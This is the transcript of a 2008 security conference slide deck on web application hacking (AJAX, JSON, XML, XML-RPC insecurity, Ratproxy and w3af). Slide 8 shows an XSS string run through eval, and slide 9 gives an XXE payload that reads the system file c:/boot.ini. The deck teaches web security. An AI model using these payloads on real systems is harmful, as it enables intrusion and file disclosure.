Extreme Web Hacking - h2hc 2008

Transcript

  • 1. Wagner Elias > Extreme Web Hacking http://wagnerelias.com São Paulo, 09/11/2008
  • 2. GET Info
  • 3. Web Security Is Simple
  • 4. Not Stupid
  • 5. Extreme Web Resources
  • 6. AJAX INSECURITY - 1
  • 7. AJAX INSECURITY - 2
  • 8. JSON INSECURITY
        var json = "['Wagner', 2008, ''];alert('XSS');//']";
        var myArray = eval(json);
  • 9. XML INSECURITY - 1
        <?xml version="1.0" encoding="ISO-8859-1"?>
        <!DOCTYPE foo [
          <!ELEMENT foo ANY>
          <!ENTITY xxe SYSTEM "file://c:/boot.ini">
        ]>
        <foo>&xxe;</foo>
  • 10. XML INSECURITY - 2
  • 11. XML-RPC INSECURITY
  • 12. Extreme Web Hacking
  • 13. Passive Analysis with Ratproxy
  • 14. Exploring Web Resources with w3af
  • 15. Questions?
  • 16. References